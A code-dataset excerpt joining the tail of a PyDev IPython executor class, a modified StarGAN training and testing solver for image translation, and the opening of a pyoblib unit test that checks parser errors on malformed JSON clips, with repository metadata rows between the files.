class IPythonCodeExecutor(BaseCodeExecutor):
'''
The methods in this class should be registered in the xml-rpc server.
'''
def __init__(self, show_banner=True, rpc_client=None):
super(IPythonCodeExecutor, self).__init__()
self.interpreter = get_pydev_ipython_frontend(rpc_client)
self._input_error_printed = False
self.notification_succeeded = False
self.notification_tries = 0
self.notification_max_tries = 3
self.show_banner = show_banner
def get_greeting_msg(self):
if self.show_banner:
self.interpreter.show_banner()
return self.interpreter.get_greeting_msg()
def do_add_exec(self, code_fragment):
self.notify_about_magic()
if code_fragment.text.rstrip().endswith('??'):
print('IPython-->')
try:
res = bool(self.interpreter.add_exec(code_fragment.text))
finally:
if code_fragment.text.rstrip().endswith('??'):
print('<--IPython')
return res
def get_namespace(self):
return self.interpreter.get_namespace()
def close(self):
sys.exit(0)
def notify_about_magic(self):
pass
def get_ipython_hidden_vars_dict(self):
try:
if hasattr(self.interpreter, 'ipython') and hasattr(self.interpreter.ipython, 'user_ns_hidden'):
user_ns_hidden = self.interpreter.ipython.user_ns_hidden
if isinstance(user_ns_hidden, dict):
# Since IPython 2 dict `user_ns_hidden` contains hidden variables and values
user_hidden_dict = user_ns_hidden.copy()
else:
# In IPython 1.x `user_ns_hidden` used to be a set with names of hidden variables
user_hidden_dict = dict([(key, val) for key, val in dict_iter_items(self.interpreter.ipython.user_ns)
if key in user_ns_hidden])
# while `_`, `__` and `___` were not initialized, they are not presented in `user_ns_hidden`
user_hidden_dict.setdefault('_', '')
user_hidden_dict.setdefault('__', '')
user_hidden_dict.setdefault('___', '')
return user_hidden_dict
except:
# Getting IPython variables shouldn't break loading frame variables
traceback.print_exc()
| 39.974026
| 121
| 0.598116
|
794dbc0c94eb68d3f533d5b6ca14865a8896bf7e
| 34,754
|
py
|
Python
|
solver.py
|
michaelaesquire/stargan-morpheus
|
022eab14d26e06c24de91091fe06a207e199fb53
|
[
"MIT"
] | 1
|
2020-07-28T18:59:53.000Z
|
2020-07-28T18:59:53.000Z
|
solver.py
|
michaelaesquire/stargan-morpheus
|
022eab14d26e06c24de91091fe06a207e199fb53
|
[
"MIT"
] | null | null | null |
solver.py
|
michaelaesquire/stargan-morpheus
|
022eab14d26e06c24de91091fe06a207e199fb53
|
[
"MIT"
] | null | null | null |
from model import Generator
from model import Discriminator
from torch.autograd import Variable
from torchvision.utils import save_image
from torchvision.utils import make_grid
import torch
import torch.nn.functional as F
import numpy as np
import os
import time
import datetime
from PIL import Image
import cv2
class Solver(object):
"""Solver for training and testing StarGAN."""
def __init__(self, celeba_loader, rafd_loader, config):
"""Initialize configurations."""
# Data loader.
self.celeba_loader = celeba_loader
self.rafd_loader = rafd_loader
# Model configurations.
self.c_dim = config.c_dim
self.c2_dim = config.c2_dim
self.image_size = config.image_size
self.g_conv_dim = config.g_conv_dim
self.d_conv_dim = config.d_conv_dim
self.g_repeat_num = config.g_repeat_num
self.d_repeat_num = config.d_repeat_num
self.lambda_cls = config.lambda_cls
self.lambda_rec = config.lambda_rec
self.lambda_gp = config.lambda_gp
self.lambda_lvl = config.lambda_lvl
# Training configurations.
self.dataset = config.dataset
self.batch_size = config.batch_size
self.num_iters = config.num_iters
self.num_iters_decay = config.num_iters_decay
self.g_lr = config.g_lr
self.d_lr = config.d_lr
self.n_critic = config.n_critic
self.beta1 = config.beta1
self.beta2 = config.beta2
self.resume_iters = config.resume_iters
self.selected_attrs = config.selected_attrs
# Test configurations.
self.test_iters = config.test_iters
# Miscellaneous.
self.use_tensorboard = config.use_tensorboard
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Directories.
self.log_dir = config.log_dir
self.sample_dir = config.sample_dir
self.model_save_dir = config.model_save_dir
self.result_dir = config.result_dir
# Step size.
self.log_step = config.log_step
self.sample_step = config.sample_step
self.model_save_step = config.model_save_step
self.lr_update_step = config.lr_update_step
# Build the model and tensorboard.
self.build_model()
if self.use_tensorboard:
self.build_tensorboard()
def build_model(self):
"""Create a generator and a discriminator."""
if self.dataset in ['CelebA', 'RaFD']:
self.G = Generator(self.g_conv_dim, self.c_dim, self.g_repeat_num)
self.D = Discriminator(self.image_size, self.d_conv_dim, self.c_dim, self.d_repeat_num)
elif self.dataset in ['Both']:
self.G = Generator(self.g_conv_dim, self.c_dim+self.c2_dim+2, self.g_repeat_num) # 2 for mask vector.
self.D = Discriminator(self.image_size, self.d_conv_dim, self.c_dim+self.c2_dim, self.d_repeat_num)
self.g_optimizer = torch.optim.Adam(self.G.parameters(), self.g_lr, [self.beta1, self.beta2])
self.d_optimizer = torch.optim.Adam(self.D.parameters(), self.d_lr, [self.beta1, self.beta2])
self.print_network(self.G, 'G')
self.print_network(self.D, 'D')
self.G.to(self.device)
self.D.to(self.device)
def print_network(self, model, name):
"""Print out the network information."""
num_params = 0
for p in model.parameters():
num_params += p.numel()
print(model)
print(name)
print("The number of parameters: {}".format(num_params))
def restore_model(self, resume_iters):
"""Restore the trained generator and discriminator."""
print('Loading the trained models from step {}...'.format(resume_iters))
G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(resume_iters))
D_path = os.path.join(self.model_save_dir, '{}-D.ckpt'.format(resume_iters))
self.G.load_state_dict(torch.load(G_path, map_location=lambda storage, loc: storage))
self.D.load_state_dict(torch.load(D_path, map_location=lambda storage, loc: storage))
def build_tensorboard(self):
"""Build a tensorboard logger."""
from logger import Logger
self.logger = Logger(self.log_dir)
def update_lr(self, g_lr, d_lr):
"""Decay learning rates of the generator and discriminator."""
for param_group in self.g_optimizer.param_groups:
param_group['lr'] = g_lr
for param_group in self.d_optimizer.param_groups:
param_group['lr'] = d_lr
def reset_grad(self):
"""Reset the gradient buffers."""
self.g_optimizer.zero_grad()
self.d_optimizer.zero_grad()
def denorm(self, x):
"""Convert the range from [-1, 1] to [0, 1]."""
out = (x + 1) / 2
return out.clamp_(0, 1)
def gradient_penalty(self, y, x):
"""Compute gradient penalty: (L2_norm(dy/dx) - 1)**2."""
weight = torch.ones(y.size()).to(self.device)
dydx = torch.autograd.grad(outputs=y,
inputs=x,
grad_outputs=weight,
retain_graph=True,
create_graph=True,
only_inputs=True)[0]
dydx = dydx.view(dydx.size(0), -1)
dydx_l2norm = torch.sqrt(torch.sum(dydx**2, dim=1))
return torch.mean((dydx_l2norm-1)**2)
def label2onehot(self, labels, dim):
"""Convert label indices to one-hot vectors."""
batch_size = labels.size(0)
out = torch.zeros(batch_size, dim)
out[np.arange(batch_size), labels.long()] = 1
return out
def create_labels(self, c_org, c_dim=5, dataset='CelebA', selected_attrs=None):
"""Generate target domain labels for debugging and testing."""
# Get hair color indices.
if dataset == 'CelebA':
hair_color_indices = []
for i, attr_name in enumerate(selected_attrs):
if attr_name in ['Black_Hair', 'Blond_Hair', 'Brown_Hair', 'Gray_Hair']:
hair_color_indices.append(i)
c_trg_list = []
for i in range(c_dim):
if dataset == 'CelebA':
c_trg = c_org.clone()
if i in hair_color_indices: # Set one hair color to 1 and the rest to 0.
c_trg[:, i] = 1
for j in hair_color_indices:
if j != i:
c_trg[:, j] = 0
else:
c_trg[:, i] = (c_trg[:, i] == 0) # Reverse attribute value.
elif dataset == 'RaFD':
c_trg = self.label2onehot(torch.ones(c_org.size(0))*i, c_dim)
c_trg_list.append(c_trg.to(self.device))
return c_trg_list
def classification_loss(self, logit, target, dataset='CelebA'):
"""Compute binary or softmax cross entropy loss."""
if dataset == 'CelebA':
return F.binary_cross_entropy_with_logits(logit, target, size_average=False) / logit.size(0)
elif dataset == 'RaFD':
return F.cross_entropy(logit, target)
def train(self):
"""Train StarGAN within a single dataset."""
# Set data loader.
if self.dataset == 'CelebA':
data_loader = self.celeba_loader
elif self.dataset == 'RaFD':
data_loader, _ = self.rafd_loader
# Fetch fixed inputs for debugging.
data_iter = iter(data_loader)
x_fixed, c_org = next(data_iter)
x_fixed = x_fixed.to(self.device)
c_fixed_list = self.create_labels(c_org, self.c_dim, self.dataset, self.selected_attrs)
# Learning rate cache for decaying.
g_lr = self.g_lr
d_lr = self.d_lr
# Start training from scratch or resume training.
start_iters = 0
if self.resume_iters:
start_iters = self.resume_iters
self.restore_model(self.resume_iters)
# Start training.
print('Start training...')
start_time = time.time()
for i in range(start_iters, self.num_iters):
# =================================================================================== #
# 1. Preprocess input data #
# =================================================================================== #
# Fetch real images and labels.
try:
x_real, label_org = next(data_iter)
except:
data_iter = iter(data_loader)
x_real, label_org = next(data_iter)
# Generate target domain labels randomly.
rand_idx = torch.randperm(label_org.size(0))
label_trg = label_org[rand_idx]
if self.dataset == 'CelebA':
c_org = label_org.clone()
c_trg = label_trg.clone()
elif self.dataset == 'RaFD':
c_org = self.label2onehot(label_org, self.c_dim)
c_trg = self.label2onehot(label_trg, self.c_dim)
x_real = x_real.to(self.device) # Input images.
c_org = c_org.to(self.device) # Original domain labels.
c_trg = c_trg.to(self.device) # Target domain labels.
label_org = label_org.to(self.device) # Labels for computing classification loss.
label_trg = label_trg.to(self.device) # Labels for computing classification loss.
# =================================================================================== #
# 2. Train the discriminator #
# =================================================================================== #
# Compute loss with real images.
out_src, out_cls = self.D(x_real)
d_loss_real = - torch.mean(out_src)
d_loss_cls = self.classification_loss(out_cls, label_org, self.dataset)
# Compute loss with fake images.
x_fake = self.G(x_real, c_trg)
out_src, out_cls = self.D(x_fake.detach())
d_loss_fake = torch.mean(out_src)
# Compute loss for gradient penalty.
alpha = torch.rand(x_real.size(0), 1, 1, 1).to(self.device)
x_hat = (alpha * x_real.data + (1 - alpha) * x_fake.data).requires_grad_(True)
out_src, _ = self.D(x_hat)
d_loss_gp = self.gradient_penalty(out_src, x_hat)
# Backward and optimize.
d_loss = d_loss_real + d_loss_fake + self.lambda_cls * d_loss_cls + self.lambda_gp * d_loss_gp
self.reset_grad()
d_loss.backward()
self.d_optimizer.step()
# Logging.
loss = {}
loss['D/loss_real'] = d_loss_real.item()
loss['D/loss_fake'] = d_loss_fake.item()
loss['D/loss_cls'] = d_loss_cls.item()
loss['D/loss_gp'] = d_loss_gp.item()
# =================================================================================== #
# 3. Train the generator #
# =================================================================================== #
if (i+1) % self.n_critic == 0:
# Original-to-target domain.
x_fake = self.G(x_real, c_trg)
out_src, out_cls = self.D(x_fake)
g_loss_fake = - torch.mean(out_src)
g_loss_cls = self.classification_loss(out_cls, label_trg, self.dataset)
# Target-to-original domain.
x_reconst = self.G(x_fake, c_org)
g_loss_rec = torch.mean(torch.abs(x_real - x_reconst))
# ===
# Backward and optimize.
modification = torch.mean(x_fake - x_real, dim=(2,3), keepdim=True)
# reminder from debugging
#print(x_fake.size())
#print(x_real.size())
g_loss_lvl = torch.mean(torch.square(x_fake - modification))
lambda_lvl = self.lambda_lvl # you can try smaller or larger value here
g_loss = g_loss_fake + self.lambda_rec * g_loss_rec + self.lambda_cls * g_loss_cls + lambda_lvl * g_loss_lvl
self.reset_grad()
g_loss.backward()
self.g_optimizer.step()
# Logging.
loss['G/loss_fake'] = g_loss_fake.item()
loss['G/loss_rec'] = g_loss_rec.item()
loss['G/loss_cls'] = g_loss_cls.item()
# =================================================================================== #
# 4. Miscellaneous #
# =================================================================================== #
# Print out training information.
if (i+1) % self.log_step == 0:
et = time.time() - start_time
et = str(datetime.timedelta(seconds=et))[:-7]
log = "Elapsed [{}], Iteration [{}/{}]".format(et, i+1, self.num_iters)
for tag, value in loss.items():
log += ", {}: {:.4f}".format(tag, value)
print(log)
if self.use_tensorboard:
for tag, value in loss.items():
self.logger.scalar_summary(tag, value, i+1)
# Translate fixed images for debugging.
if (i+1) % self.sample_step == 0:
with torch.no_grad():
x_fake_list = [x_fixed]
for c_fixed in c_fixed_list:
x_fake_list.append(self.G(x_fixed, c_fixed))
x_concat = torch.cat(x_fake_list, dim=3)
sample_path = os.path.join(self.sample_dir, '{}-images.jpg'.format(i+1))
save_image(self.denorm(x_concat.data.cpu()), sample_path, nrow=1, padding=0)
print('Saved real and fake images into {}...'.format(sample_path))
# Save model checkpoints.
if (i+1) % self.model_save_step == 0:
G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(i+1))
D_path = os.path.join(self.model_save_dir, '{}-D.ckpt'.format(i+1))
torch.save(self.G.state_dict(), G_path)
torch.save(self.D.state_dict(), D_path)
print('Saved model checkpoints into {}...'.format(self.model_save_dir))
# Decay learning rates.
if (i+1) % self.lr_update_step == 0 and (i+1) > (self.num_iters - self.num_iters_decay):
g_lr -= (self.g_lr / float(self.num_iters_decay))
d_lr -= (self.d_lr / float(self.num_iters_decay))
self.update_lr(g_lr, d_lr)
print ('Decayed learning rates, g_lr: {}, d_lr: {}.'.format(g_lr, d_lr))
def train_multi(self):
"""Train StarGAN with multiple datasets."""
# Data iterators.
celeba_iter = iter(self.celeba_loader)
rafd_iter = iter(self.rafd_loader)
# Fetch fixed inputs for debugging.
x_fixed, c_org = next(celeba_iter)
x_fixed = x_fixed.to(self.device)
c_celeba_list = self.create_labels(c_org, self.c_dim, 'CelebA', self.selected_attrs)
c_rafd_list = self.create_labels(c_org, self.c2_dim, 'RaFD')
zero_celeba = torch.zeros(x_fixed.size(0), self.c_dim).to(self.device) # Zero vector for CelebA.
zero_rafd = torch.zeros(x_fixed.size(0), self.c2_dim).to(self.device) # Zero vector for RaFD.
mask_celeba = self.label2onehot(torch.zeros(x_fixed.size(0)), 2).to(self.device) # Mask vector: [1, 0].
mask_rafd = self.label2onehot(torch.ones(x_fixed.size(0)), 2).to(self.device) # Mask vector: [0, 1].
# Learning rate cache for decaying.
g_lr = self.g_lr
d_lr = self.d_lr
# Start training from scratch or resume training.
start_iters = 0
if self.resume_iters:
start_iters = self.resume_iters
self.restore_model(self.resume_iters)
# Start training.
print('Start training...')
start_time = time.time()
for i in range(start_iters, self.num_iters):
for dataset in ['CelebA', 'RaFD']:
# =================================================================================== #
# 1. Preprocess input data #
# =================================================================================== #
# Fetch real images and labels.
data_iter = celeba_iter if dataset == 'CelebA' else rafd_iter
try:
x_real, label_org = next(data_iter)
except:
if dataset == 'CelebA':
celeba_iter = iter(self.celeba_loader)
x_real, label_org = next(celeba_iter)
elif dataset == 'RaFD':
rafd_iter = iter(self.rafd_loader)
x_real, label_org = next(rafd_iter)
# Generate target domain labels randomly.
rand_idx = torch.randperm(label_org.size(0))
label_trg = label_org[rand_idx]
if dataset == 'CelebA':
c_org = label_org.clone()
c_trg = label_trg.clone()
zero = torch.zeros(x_real.size(0), self.c2_dim)
mask = self.label2onehot(torch.zeros(x_real.size(0)), 2)
c_org = torch.cat([c_org, zero, mask], dim=1)
c_trg = torch.cat([c_trg, zero, mask], dim=1)
elif dataset == 'RaFD':
c_org = self.label2onehot(label_org, self.c2_dim)
c_trg = self.label2onehot(label_trg, self.c2_dim)
zero = torch.zeros(x_real.size(0), self.c_dim)
mask = self.label2onehot(torch.ones(x_real.size(0)), 2)
c_org = torch.cat([zero, c_org, mask], dim=1)
c_trg = torch.cat([zero, c_trg, mask], dim=1)
x_real = x_real.to(self.device) # Input images.
c_org = c_org.to(self.device) # Original domain labels.
c_trg = c_trg.to(self.device) # Target domain labels.
label_org = label_org.to(self.device) # Labels for computing classification loss.
label_trg = label_trg.to(self.device) # Labels for computing classification loss.
# =================================================================================== #
# 2. Train the discriminator #
# =================================================================================== #
# Compute loss with real images.
out_src, out_cls = self.D(x_real)
out_cls = out_cls[:, :self.c_dim] if dataset == 'CelebA' else out_cls[:, self.c_dim:]
d_loss_real = - torch.mean(out_src)
d_loss_cls = self.classification_loss(out_cls, label_org, dataset)
# Compute loss with fake images.
x_fake = self.G(x_real, c_trg)
out_src, _ = self.D(x_fake.detach())
d_loss_fake = torch.mean(out_src)
# Compute loss for gradient penalty.
alpha = torch.rand(x_real.size(0), 1, 1, 1).to(self.device)
x_hat = (alpha * x_real.data + (1 - alpha) * x_fake.data).requires_grad_(True)
out_src, _ = self.D(x_hat)
d_loss_gp = self.gradient_penalty(out_src, x_hat)
# Backward and optimize.
d_loss = d_loss_real + d_loss_fake + self.lambda_cls * d_loss_cls + self.lambda_gp * d_loss_gp
self.reset_grad()
d_loss.backward()
self.d_optimizer.step()
# Logging.
loss = {}
loss['D/loss_real'] = d_loss_real.item()
loss['D/loss_fake'] = d_loss_fake.item()
loss['D/loss_cls'] = d_loss_cls.item()
loss['D/loss_gp'] = d_loss_gp.item()
# =================================================================================== #
# 3. Train the generator #
# =================================================================================== #
if (i+1) % self.n_critic == 0:
# Original-to-target domain.
x_fake = self.G(x_real, c_trg)
out_src, out_cls = self.D(x_fake)
out_cls = out_cls[:, :self.c_dim] if dataset == 'CelebA' else out_cls[:, self.c_dim:]
g_loss_fake = - torch.mean(out_src)
g_loss_cls = self.classification_loss(out_cls, label_trg, dataset)
# Target-to-original domain.
x_reconst = self.G(x_fake, c_org)
g_loss_rec = torch.mean(torch.abs(x_real - x_reconst))
# Backward and optimize.
g_loss = g_loss_fake + self.lambda_rec * g_loss_rec + self.lambda_cls * g_loss_cls
self.reset_grad()
g_loss.backward()
self.g_optimizer.step()
# Logging.
loss['G/loss_fake'] = g_loss_fake.item()
loss['G/loss_rec'] = g_loss_rec.item()
loss['G/loss_cls'] = g_loss_cls.item()
# =================================================================================== #
# 4. Miscellaneous #
# =================================================================================== #
# Print out training info.
if (i+1) % self.log_step == 0:
et = time.time() - start_time
et = str(datetime.timedelta(seconds=et))[:-7]
log = "Elapsed [{}], Iteration [{}/{}], Dataset [{}]".format(et, i+1, self.num_iters, dataset)
for tag, value in loss.items():
log += ", {}: {:.4f}".format(tag, value)
print(log)
if self.use_tensorboard:
for tag, value in loss.items():
self.logger.scalar_summary(tag, value, i+1)
# Translate fixed images for debugging.
if (i+1) % self.sample_step == 0:
with torch.no_grad():
x_fake_list = [x_fixed]
for c_fixed in c_celeba_list:
c_trg = torch.cat([c_fixed, zero_rafd, mask_celeba], dim=1)
x_fake_list.append(self.G(x_fixed, c_trg))
for c_fixed in c_rafd_list:
c_trg = torch.cat([zero_celeba, c_fixed, mask_rafd], dim=1)
x_fake_list.append(self.G(x_fixed, c_trg))
x_concat = torch.cat(x_fake_list, dim=3)
sample_path = os.path.join(self.sample_dir, '{}-images.jpg'.format(i+1))
save_image(self.denorm(x_concat.data.cpu()), sample_path, nrow=1, padding=0)
print('Saved real and fake images into {}...'.format(sample_path))
# Save model checkpoints.
if (i+1) % self.model_save_step == 0:
G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(i+1))
D_path = os.path.join(self.model_save_dir, '{}-D.ckpt'.format(i+1))
torch.save(self.G.state_dict(), G_path)
torch.save(self.D.state_dict(), D_path)
print('Saved model checkpoints into {}...'.format(self.model_save_dir))
# Decay learning rates.
if (i+1) % self.lr_update_step == 0 and (i+1) > (self.num_iters - self.num_iters_decay):
g_lr -= (self.g_lr / float(self.num_iters_decay))
d_lr -= (self.d_lr / float(self.num_iters_decay))
self.update_lr(g_lr, d_lr)
print ('Decayed learning rates, g_lr: {}, d_lr: {}.'.format(g_lr, d_lr))
def test(self):
"""Translate images using StarGAN trained on a single dataset."""
# Load the trained generator.
self.restore_model(self.test_iters)
# Set data loader.
if self.dataset == 'CelebA':
data_loader = self.celeba_loader
elif self.dataset == 'RaFD':
data_loader, imgnames = self.rafd_loader
with torch.no_grad():
for i, (x_real, c_org) in enumerate(data_loader):
# Prepare input images and target domain labels.
#print("X REAL START")
#print(x_real)
x_real = x_real.to(self.device)
# print("X REAL END")
c_trg_list = self.create_labels(c_org, self.c_dim, self.dataset, self.selected_attrs)
#print(i)
# print("that was i")
#print(c_org) <- original c domain
# Translate images.
x_fake_list = [x_real]
for c_trg in c_trg_list:
p1 =os.path.join(self.result_dir, '{}-images.png'.format(i+1))
# print(self.G(x_real, c_trg)) ctarget
# print(x_real)
# c_trg is tensor w/ boolean 0 1, 1 if converting to that batch
# has height 16 for 16 images
# print(c_trg)
x_fake_list.append(self.G(x_real, c_trg))
# Save the translated images.
x_concat = torch.cat(x_fake_list, dim=3)
# print("x_concat")
# print(x_concat)
# print(x_concat.shape)
# print("x_fake_list")
# print(x_fake_list[0])
# print(torch.min(x_fake_list[0]))
# with one image, torch.Size([1, 3, 128, 512]) for x_concat
# print(torch.max(x_fake_list[0])) tensor(-0.7412)
# print(torch.min(x_fake_list[0])) tensor(-1)
# with one image, torch.Size([1, 3, 128, 128]) for x_fake_list[0]
og_image_name = os.path.basename(self.result_dir)
#print(x_concat)
result_path = os.path.join(self.result_dir, og_image_name+'-{}-images.png'.format(i+1))
result_path2 = os.path.join(self.result_dir,'{}-imageseeee.png'.format(i+1))
save_image(self.denorm(x_concat.data.cpu()), result_path, nrow=1, padding=0)
#print(x_real[1,:,:,:])
#print(x_concat.size())
# x_concat.size() = torch.Size([16, 3, 128, 1280])
# shoot, will maybe need to break this up?
# list of images (vertically)
num_imgs = list(x_real.size())[0] # will always be 8 with the current settings (09-21-2020) UNLESS you're at the end of the batch, where it can be < 8
img_size =list(x_real.size())[2] # will always be 128 as long as I keep my settings
full_im_width = list(x_concat.size())[3] # width of the combined images
num_batches = full_im_width/img_size # number of batches (includes real)
# save all of the original images---just for testing really
for q in range(0,num_imgs):
# if not os.path.exists(self.result_dir + '/real/'):
# os.mkdir(self.result_dir + '/real/')
# current_im = x_real[q,:,:,:]
# # need a better counter than the q+1, but keeping a tracker for each individual batch might be hard.
# # right now, will be overwritten if there are more than 16 images to batch
# result_path_im = os.path.join(self.result_dir,'real', 'batch{}-img{}-realimages.png'.format(c_org[q]+1,(q+1)+(i*num_imgs)))
# save_image(self.denorm(current_im.data.cpu()), result_path_im, nrow=1, padding=0)
#
# secondary loop for all of the created images
# w is loop over batch numbers (ex, 0 to 3)
for w in range(0,int(num_batches)):
# print(q)
# skip "real", it's a waste of making images
# just kidding we want to make the images but I'll leave this if here just in case I change my mind
if w > -1:
# will just have the "real" ones be batch zero
subdirname =self.result_dir + '/batch' + str(w)+'/'
# get the last folder name -- I'll design this to be the name of the image so we can
# get the image name back in
og_image_name = os.path.basename(self.result_dir)
# if the subdirectory for each batch does not exist, create
if not os.path.exists(subdirname):
os.mkdir(subdirname)
start_dim = (w)*img_size
end_dim = (w+1)*img_size
# print(end_dim)
current_img_batch = x_concat[q,:,:,start_dim:end_dim] # gets current image w/ left to right-ness
#print(current_img_batch.size())
# maybe reconsider this batch to batch notation in order to make it easier? this would mean we'd have to do
# one image at a time, which is what makes the most sense, but is kinda tedious.....
# (q)+(i*8) is what's counting up, could use this to get the original image name
original_image_path = imgnames[(q)+(i*self.batch_size)]
# break down to get original name without full file path
original_image_name = os.path.split(original_image_path[0])[-1]
# this one is based off of the original images
new_result_path = os.path.join(subdirname, 'B{}_'.format(w)+ original_image_name)
#result_path_unique = os.path.join(subdirname, og_image_name+ '_B{}tB{}_b{}.png'.format(c_org[q]+1,w,(q+1)+(i*8)))
#print(result_path_unique)
grid = make_grid(self.denorm(current_img_batch.data.cpu()))
ndarr = grid.mul(65535).add_(0.5).clamp_(0, 65535).permute(1, 2, 0).to('cpu', torch.int16).numpy()
ndarr8 = grid.mul(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
#print("grid")
#print(grid)
#print(self.denorm(current_img_batch.data.cpu()).shape)
#print("NDARR")
#print(ndarr)
#print(ndarr.shape) # (128, 128, 3)
#print("NDARR8")
#print(ndarr8)
#print("Image NDARR8")
# print(Image.fromarray(ndarr8))
cv2.imwrite(new_result_path, ndarr.astype(np.uint16) )
#save_image(self.denorm(current_img_batch.data.cpu()),new_result_path,nrow=1,padding=0)
# torch.Size([16, 3, 128, 128])
# save_image(self.denorm(x_real.data.cpu()), result_path2, nrow=1, padding=0)
# x_real is just all of the original ones, maybe find a way to break that up?
print('Saved real and fake images into {}...'.format(result_path))
def test_multi(self):
"""Translate images using StarGAN trained on multiple datasets."""
# Load the trained generator.
self.restore_model(self.test_iters)
with torch.no_grad():
for i, (x_real, c_org) in enumerate(self.celeba_loader):
# Prepare input images and target domain labels.
x_real = x_real.to(self.device)
c_celeba_list = self.create_labels(c_org, self.c_dim, 'CelebA', self.selected_attrs)
c_rafd_list = self.create_labels(c_org, self.c2_dim, 'RaFD')
zero_celeba = torch.zeros(x_real.size(0), self.c_dim).to(self.device) # Zero vector for CelebA.
zero_rafd = torch.zeros(x_real.size(0), self.c2_dim).to(self.device) # Zero vector for RaFD.
mask_celeba = self.label2onehot(torch.zeros(x_real.size(0)), 2).to(self.device) # Mask vector: [1, 0].
mask_rafd = self.label2onehot(torch.ones(x_real.size(0)), 2).to(self.device) # Mask vector: [0, 1].
# Translate images.
x_fake_list = [x_real]
for c_celeba in c_celeba_list:
c_trg = torch.cat([c_celeba, zero_rafd, mask_celeba], dim=1)
x_fake_list.append(self.G(x_real, c_trg))
for c_rafd in c_rafd_list:
c_trg = torch.cat([zero_celeba, c_rafd, mask_rafd], dim=1)
x_fake_list.append(self.G(x_real, c_trg))
# Save the translated images.
x_concat = torch.cat(x_fake_list, dim=3)
result_path = os.path.join(self.result_dir, '{}-images.jpg'.format(i+1))
save_image(self.denorm(x_concat.data.cpu()), result_path, nrow=1, padding=0)
print('Saved real and fake images into {}...'.format(result_path))
| 49.790831
| 166
| 0.508776
|
794dbd4a4984846367c3a9606fbdc3f433cabd55
| 135,885
|
py
|
Python
|
oblib/tests/test_json_clips.py
|
michael-bbs/pyoblib
|
f7f11d455809d80b7701fa89b69995dc703dfbab
|
[
"Apache-2.0"
] | null | null | null |
oblib/tests/test_json_clips.py
|
michael-bbs/pyoblib
|
f7f11d455809d80b7701fa89b69995dc703dfbab
|
[
"Apache-2.0"
] | null | null | null |
oblib/tests/test_json_clips.py
|
michael-bbs/pyoblib
|
f7f11d455809d80b7701fa89b69995dc703dfbab
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 SunSpec Alliance
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from inspect import currentframe
import unittest
import parser
import taxonomy
import pytest
taxonomy = taxonomy.Taxonomy()
parser = parser.Parser(taxonomy)
def _ln():
# Returns line number of caller.
cf = currentframe()
return cf.f_back.f_lineno
class TestJsonClips(unittest.TestCase):
# Note: this module is tested differently than others. Erroneous JSON clips are run through
# the parser validator method and should cause various error methods to occur. The resulting
# exception string is expected to match a regular expression which should prove that enough
# information is returned to correctly diagnose the error (although a perfect match is not
# necessarily required unless noted via the expression). A line number in the JSON also is
# present and in an ideal world the line number should also be decipherable fromt he parser.
def test_clips(self):
failure_list = []
for clip in CLIPS:
try:
parser.from_JSON_string(JSON_HEADER + clip[4] + JSON_FOOTER, entrypoint_name=clip[1])
if clip[2] is not None:
failure_list.append("Case {} did not cause a failure condition as expected".format(clip[0]))
except Exception as e:
s = str(e)
if clip[2] is None:
failure_list.append("Case {} should have succeeded, raised {}".format(clip[0], s))
elif re.search(clip[2], s, re.IGNORECASE) is None:
failure_list.append("Case {} exception text '{}' did not meet expected value '{}'".format(clip[0], s, clip[2]))
if len(failure_list) > 0:
msg = "\n"
for f in failure_list:
msg = msg + f + "\n"
# TODO: Uncomment this line and remove the print statement. At this point in time the
# validator rules are not implemented so this test case cannot actually fail although
# in reality it should be failing.
# self.fail(msg)
print(msg)
CLIPS = [
[_ln(), "MonthlyOperatingReport", "Identifier is not a uuid", 1, """
{
"illegal-identifier": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Float expected", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Bad Data",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "is not a writeable concept", 4, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Bad Data",
"aspects": {
"concept": 2,
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Entity is not a string", 5, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Bad Data",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": 3,
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Illegal Period Start", 6, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-13-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Illegal Period End", 7, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-13-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Identifier is not a uuid", 1, """
{
"illegal-identifier": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Value is missing", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
